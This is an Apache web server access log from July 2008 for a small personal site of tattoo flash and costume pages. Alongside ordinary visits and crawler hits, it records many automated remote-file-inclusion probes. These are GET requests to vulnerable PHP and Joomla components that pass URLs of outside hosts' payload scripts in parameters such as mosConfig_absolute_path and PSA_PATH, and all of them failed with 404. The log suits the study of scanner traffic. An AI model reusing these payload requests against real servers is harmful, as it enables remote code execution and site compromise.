71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:12 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:13 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:13 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:13 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:28 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:28 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:28 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.106.190.75 - - [29/Jul/2008:00:00:28 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
210.245.87.117 - - [29/Jul/2008:00:00:55 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
72.248.189.82 - - [29/Jul/2008:00:01:56 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
72.248.189.82 - - [29/Jul/2008:00:01:59 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
210.245.87.117 - - [29/Jul/2008:00:03:08 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
210.245.87.117 - - [29/Jul/2008:00:03:08 -0500] "GET //appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
210.245.87.117 - - [29/Jul/2008:00:03:09 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
71.161.18.157 - - [29/Jul/2008:00:03:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.161.18.157 - - [29/Jul/2008:00:03:39 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
71.161.18.157 - - [29/Jul/2008:00:03:39 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
209.97.201.148 - - [29/Jul/2008:00:04:37 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:00:04:37 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.245.87.117 - - [29/Jul/2008:00:07:09 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.15.158.164 - - [29/Jul/2008:00:08:03 -0500] "GET /logs/access_log.1214438400//appserv/main.php?appserv_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
67.15.158.164 - - [29/Jul/2008:00:08:03 -0500] "GET //appserv/main.php?appserv_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
67.15.158.164 - - [29/Jul/2008:00:08:03 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
79.98.179.69 - - [29/Jul/2008:00:10:34 -0500] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 349 "-""libwww-perl/5.64"
79.98.179.69 - - [29/Jul/2008:00:10:34 -0500] "GET ///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 344 "-""libwww-perl/5.64"
68.84.9.130 - - [29/Jul/2008:00:15:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1"
68.84.9.130 - - [29/Jul/2008:00:15:12 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1"
68.84.9.130 - - [29/Jul/2008:00:15:12 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1"
68.84.9.130 - - [29/Jul/2008:00:15:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1"
68.84.9.130 - - [29/Jul/2008:00:15:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1"
67.15.158.164 - - [29/Jul/2008:00:15:53 -0500] "GET /logs/access_log.1212883200//appserv/main.php?appserv_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
62.76.116.20 - - [29/Jul/2008:00:17:44 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
62.76.116.20 - - [29/Jul/2008:00:17:49 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
80.231.0.98 - - [29/Jul/2008:00:19:35 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.saltgum.com/mild.net???? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
80.231.0.98 - - [29/Jul/2008:00:19:36 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.saltgum.com/mild.net???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
70.85.201.66 - - [29/Jul/2008:00:24:56 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
70.85.201.66 - - [29/Jul/2008:00:24:56 -0500] "GET /logs/access_log.1212883200/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
70.85.201.66 - - [29/Jul/2008:00:24:56 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
67.19.51.194 - - [29/Jul/2008:00:25:13 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/borrar/media/tempe.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
67.19.51.194 - - [29/Jul/2008:00:25:13 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/borrar/media/tempe.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
70.85.201.66 - - [29/Jul/2008:00:25:14 -0500] "GET /logs/access_log.1207785600/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
195.5.163.212 - - [29/Jul/2008:00:28:09 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.97.201.148 - - [29/Jul/2008:00:28:26 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:00:28:28 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
79.98.179.69 - - [29/Jul/2008:00:32:37 -0500] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 349 "-""libwww-perl/5.64"
79.98.179.69 - - [29/Jul/2008:00:32:37 -0500] "GET ///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 344 "-""libwww-perl/5.64"
200.69.42.116 - - [29/Jul/2008:00:33:45 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.apnic.net/index.html? HTTP/1.0" 404 310 "-""Mozilla/5.0"
200.69.42.116 - - [29/Jul/2008:00:34:09 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.apnic.net/index.html? HTTP/1.0" 404 310 "-""Mozilla/5.0"
78.137.163.133 - - [29/Jul/2008:00:36:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [29/Jul/2008:00:36:48 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
67.192.77.37 - - [29/Jul/2008:00:36:53 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
67.192.77.37 - - [29/Jul/2008:00:36:53 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
65.55.212.47 - - [29/Jul/2008:00:39:26 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/Jul/2008:00:39:27 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 200 749270 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
207.45.177.194 - - [29/Jul/2008:00:42:34 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
207.45.177.194 - - [29/Jul/2008:00:42:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
70.149.40.18 - - [29/Jul/2008:00:43:21 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Isidorus/2.0 (Isidorus; http://www.isidorus.com; crawler@isidorus.com)"
70.149.40.18 - - [29/Jul/2008:00:43:21 -0500] "GET /tattoo HTTP/1.0" 301 318 "-""Isidorus/2.0 (Isidorus; http://www.isidorus.com; crawler@isidorus.com)"
70.149.40.18 - - [29/Jul/2008:00:43:22 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "-""Isidorus/2.0 (Isidorus; http://www.isidorus.com; crawler@isidorus.com)"
216.14.123.10 - - [29/Jul/2008:00:45:19 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
216.14.123.10 - - [29/Jul/2008:00:45:19 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
201.238.195.13 - - [29/Jul/2008:00:49:41 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:00:49:41 -0500] "GET /config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:00:49:53 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:00:49:54 -0500] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
80.67.25.19 - - [29/Jul/2008:00:51:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
80.67.25.19 - - [29/Jul/2008:00:51:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
141.85.101.1 - - [29/Jul/2008:00:56:23 -0500] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
141.85.101.1 - - [29/Jul/2008:00:56:23 -0500] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
141.85.101.1 - - [29/Jul/2008:00:56:23 -0500] "GET //stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
141.85.101.1 - - [29/Jul/2008:00:56:23 -0500] "GET //stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.95.229.220 - - [29/Jul/2008:00:57:45 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.95.229.220 - - [29/Jul/2008:00:57:45 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://h-pro.ru/lang/inc? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
201.238.195.13 - - [29/Jul/2008:00:58:25 -0500] "GET /config/dbutil.bck.php?confdir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.199.246.51 - - [29/Jul/2008:00:59:04 -0500] "GET /logs/access_log.1212883200//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.199.246.51 - - [29/Jul/2008:00:59:04 -0500] "GET //errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.199.246.51 - - [29/Jul/2008:00:59:04 -0500] "GET /logs//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
65.214.44.28 - - [29/Jul/2008:00:59:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [29/Jul/2008:00:59:45 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
201.238.195.13 - - [29/Jul/2008:01:01:24 -0500] "GET /logs/access_log.1212883200/config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:01:01:25 -0500] "GET /config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:01:01:25 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
209.234.171.33 - - [29/Jul/2008:01:03:45 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver"
209.234.171.33 - - [29/Jul/2008:01:03:45 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""ia_archiver"
201.238.195.13 - - [29/Jul/2008:01:04:02 -0500] "GET /logs/access_log.1214438400/config/dbutil.bck.php?confdir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
200.69.42.116 - - [29/Jul/2008:01:05:01 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.apnic.net/index.html? HTTP/1.0" 404 310 "-""Mozilla/5.0"
200.69.42.116 - - [29/Jul/2008:01:05:01 -0500] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://www.apnic.net/index.html? HTTP/1.0" 404 310 "-""Mozilla/5.0"
201.130.79.130 - - [29/Jul/2008:01:06:07 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:06:07 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:06:07 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:06:07 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
89.108.67.220 - - [29/Jul/2008:01:06:52 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
89.108.67.220 - - [29/Jul/2008:01:06:54 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
201.238.195.13 - - [29/Jul/2008:01:09:05 -0500] "GET /logs/access_log.1212883200/config/dbutil.bck.php?confdir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:01:09:05 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
201.238.195.13 - - [29/Jul/2008:01:11:02 -0500] "GET /logs/access_log.1214438400/config/dbutil.bck.php?confdir=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:01:11:30 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:01:11:31 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:11:36 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:11:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:11:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:01:11:52 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:01:11:52 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
200.11.67.242 - - [29/Jul/2008:01:14:26 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
200.11.67.242 - - [29/Jul/2008:01:14:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
205.234.232.195 - - [29/Jul/2008:01:17:21 -0500] "GET /index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
205.234.232.195 - - [29/Jul/2008:01:17:21 -0500] "GET /logs/index.php?INCLUDE_FOLDER=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
70.84.182.98 - - [29/Jul/2008:01:17:49 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
12.196.98.16 - - [29/Jul/2008:01:22:09 -0500] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.53"
12.196.98.16 - - [29/Jul/2008:01:22:12 -0500] "GET //stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
209.91.252.196 - - [29/Jul/2008:01:24:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:01:24:05 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:01:24:08 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:01:24:09 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:01:24:15 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
12.196.98.16 - - [29/Jul/2008:01:27:17 -0500] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.53"
12.196.98.16 - - [29/Jul/2008:01:27:17 -0500] "GET //stats/modules/My_eGallery/index.php?basepath=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
69.73.188.36 - - [29/Jul/2008:01:27:39 -0500] "GET /logs/access_log.1213315200/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:01:27:39 -0500] "GET /errors.php?error=? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.73.188.36 - - [29/Jul/2008:01:27:39 -0500] "GET /logs/errors.php?error=? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
80.67.24.222 - - [29/Jul/2008:01:34:59 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
80.67.24.222 - - [29/Jul/2008:01:35:00 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
80.67.24.222 - - [29/Jul/2008:01:35:01 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
80.67.24.222 - - [29/Jul/2008:01:35:01 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
74.6.22.163 - - [29/Jul/2008:01:36:35 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
